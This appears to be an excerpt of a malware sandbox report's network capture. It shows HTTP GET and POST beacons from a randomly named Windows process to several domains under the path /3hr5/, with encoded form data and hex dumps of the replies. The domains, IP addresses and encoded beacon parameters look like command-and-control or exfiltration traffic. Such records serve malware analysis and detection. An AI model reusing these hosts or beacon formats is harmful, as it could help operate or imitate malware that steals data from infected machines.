                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:23:31.806092978 CET6484OUTData Raw: 49 59 4b 53 4b 47 64 30 35 54 68 6e 35 59 49 51 31 55 58 6a 41 75 47 70 5a 39 70 2b 44 4a 38 74 4e 2b 39 63 36 65 48 61 6b 4a 69 78 74 4c 45 4c 44 52 50 6b 51 49 44 65 63 50 62 44 50 72 71 6c 67 56 54 76 33 53 32 55 47 5a 7a 68 7a 4e 30 59 42 31
                                                                                                                              Data Ascii: IYKSKGd05Thn5YIQ1UXjAuGpZ9p+DJ8tN+9c6eHakJixtLELDRPkQIDecPbDPrqlgVTv3S2UGZzhzN0YB1Q52FhSZCNWQj77iqdqzl2ZmnaHgl9CU1dKsvo6OD8FCHzRSchwXCeeUH7Vx4S+qz5mgTM+WgzWNrlPXilFZVB/AXvDjPItiNspXBDZH7qMvyYHSeYr7iXUEJjPBnCwCIvMNM3PvbFphLTV+1tYFjYE1dBMOZyaG6X
                                                                                                                              Dec 4, 2023 15:23:31.982289076 CET242INHTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                                                                                                                              Dec 4, 2023 15:23:31.982379913 CET2626OUTData Raw: 36 64 70 6f 43 65 68 34 57 33 31 65 66 32 73 36 41 4d 72 66 39 56 56 4e 77 75 65 56 58 49 4b 44 58 41 64 30 76 36 69 4c 39 62 35 5a 67 4f 4a 4a 67 74 44 5a 4d 72 73 71 44 79 34 4f 61 65 76 4a 73 75 4d 69 4d 62 36 4d 33 67 71 63 6f 58 4e 53 4f 66
                                                                                                                              Data Ascii: 6dpoCeh4W31ef2s6AMrf9VVNwueVXIKDXAd0v6iL9b5ZgOJJgtDZMrsqDy4OaevJsuMiMb6M3gqcoXNSOfbiON5rn5kBzUlXFk3yu9n2iMGQp2yF1++9EKlaGlt2hgbUznc8hH0dm+BOEUUmSwiMk74+032nxvPpwJA2sxU5CHzqF0paVozBAxSov8TkneTAiGyDoSVpGvPaC9Iir0Mypz5LvrRJiktxOCrwT8+biukrAZ/73En
                                                                                                                              Dec 4, 2023 15:23:31.982543945 CET1340OUTData Raw: 6f 53 6e 38 44 36 36 34 53 38 50 35 33 66 33 6a 53 2f 58 2b 65 46 6c 54 53 64 54 48 51 66 67 76 6e 39 49 49 49 42 4b 47 2f 67 4a 42 74 5a 53 44 79 39 31 2f 4e 69 48 76 63 66 53 70 61 48 4a 68 44 72 51 41 35 45 79 35 39 72 62 63 32 6c 50 30 52 35
                                                                                                                              Data Ascii: oSn8D664S8P53f3jS/X+eFlTSdTHQfgvn9IIIBKG/gJBtZSDy91/NiHvcfSpaHJhDrQA5Ey59rbc2lP0R5Zn0URvZb1HcJ/AGjR4wK1q7gL4s1C9qKkabArdkT9UYf8QirW9XQT+AsLqylkO2Jfi3b2dJ9n6TS4dSJu2Ctd/GXBCc9zJZtAB5QQvffitrEsH0Oen7W3CLg3Iq+uC0Y8ZsFg+/DikHv4ty6ZRbvtGFRQIGCp+6Zh
                                                                                                                              Dec 4, 2023 15:23:31.982698917 CET1340OUTData Raw: 2b 56 30 32 56 77 77 7a 71 34 69 41 33 79 38 34 78 7a 76 2b 71 78 39 54 57 50 74 6b 6c 67 65 66 57 47 57 62 6b 54 4f 4f 6b 70 69 48 79 36 4e 41 68 70 39 4a 36 6c 43 45 6e 76 48 32 78 61 2f 34 4a 67 6d 5a 4a 6b 4a 5a 47 53 38 50 45 4f 64 42 69 4e
                                                                                                                              Data Ascii: +V02Vwwzq4iA3y84xzv+qx9TWPtklgefWGWbkTOOkpiHy6NAhp9J6lCEnvH2xa/4JgmZJkJZGS8PEOdBiNFcY//C2v1w4urDr0r/jOOf0AnfkGkU/87eILl4RAj8lR3/h6QXgOjkAzdpiqpNc24iIViBM9x6bBallJdvlx8nlLPBFGIbiMyg5w8Ede87lKDkDFSGfROB0mw3yDzVDbvKu1BWlxRcyEqtofQi3KTfbraxUBfCZ78


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.11.205014337.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:34.507900953 CET528OUTGET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:23:34.687139034 CET1340INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                                                              Server: Apache
                                                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              X-Varnish: 1067591423 3
                                                                                                                              Age: 19015013
                                                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 64668
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                                                              Dec 4, 2023 15:23:34.687248945 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c
                                                                                                                              Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space
                                                                                                                              Dec 4, 2023 15:23:34.687321901 CET1340INData Raw: 63 2d 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e
                                                                                                                              Data Ascii: c-2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                                                              Dec 4, 2023 15:23:34.687408924 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                                                              Dec 4, 2023 15:23:34.687500000 CET1340INData Raw: 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20
                                                                                                                              Data Ascii: erved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <
                                                                                                                              Dec 4, 2023 15:23:34.687618017 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c
                                                                                                                              Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo
                                                                                                                              Dec 4, 2023 15:23:34.687722921 CET1340INData Raw: 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                                                              Dec 4, 2023 15:23:34.687786102 CET1340INData Raw: 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: a href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width=
                                                                                                                              Dec 4, 2023 15:23:34.687870026 CET1340INData Raw: 30 31 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e
                                                                                                                              Data Ascii: 01h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g
                                                                                                                              Dec 4, 2023 15:23:34.687931061 CET1340INData Raw: 37 2c 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: 7,25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-
                                                                                                                              Dec 4, 2023 15:23:34.864106894 CET1340INData Raw: 20 20 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c
                                                                                                                              Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.11.2050144108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:23:40.397598982 CET831OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.metodomestredojogo.com
                                                                                                                              Referer: http://www.metodomestredojogo.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 45 5a 76 46 43 6a 70 56 61 78 45 7a 63 72 67 6d 47 46 69 6d 4f 54 4e 55 69 35 57 6f 54 57 39 52 48 44 35 44 44 41 50 61 79 4e 6c 4f 61 6b 6d 57 39 66 4e 4f 73 58 69 65 62 6e 44 36 64 68 66 45 53 75 33 41 34 6b 45 50 31 73 52 49 73 68 78 42 44 63 72 57 78 4e 36 52 4b 2f 44 6f 54 79 34 32 48 48 54 68 39 66 79 73 37 2f 66 6b 7a 32 51 41 61 71 4c 32 53 44 74 4d 37 4f 74 57 37 4f 35 6d 61 72 56 59 52 30 50 6f 35 5a 6b 36 72 75 54 7a 66 59 6f 47 6c 57 5a 74 68 68 56 45 31 47 52 59 36 4e 2b 64 4a 77 78 5a 32 4a 35 56 64 6b 33 2b 7a 77 3d 3d
                                                                                                                              Data Ascii: TZd=EZvFCjpVaxEzcrgmGFimOTNUi5WoTW9RHD5DDAPayNlOakmW9fNOsXiebnD6dhfESu3A4kEP1sRIshxBDcrWxN6RK/DoTy42HHTh9fys7/fkz2QAaqL2SDtM7OtW7O5marVYR0Po5Zk6ruTzfYoGlWZthhVE1GRY6N+dJwxZ2J5Vdk3+zw==
                                                                                                                              Dec 4, 2023 15:23:40.651324987 CET1340INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:23:40 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 6505
                                                                                                                              Content-Type: text/html; charset=UTF-8
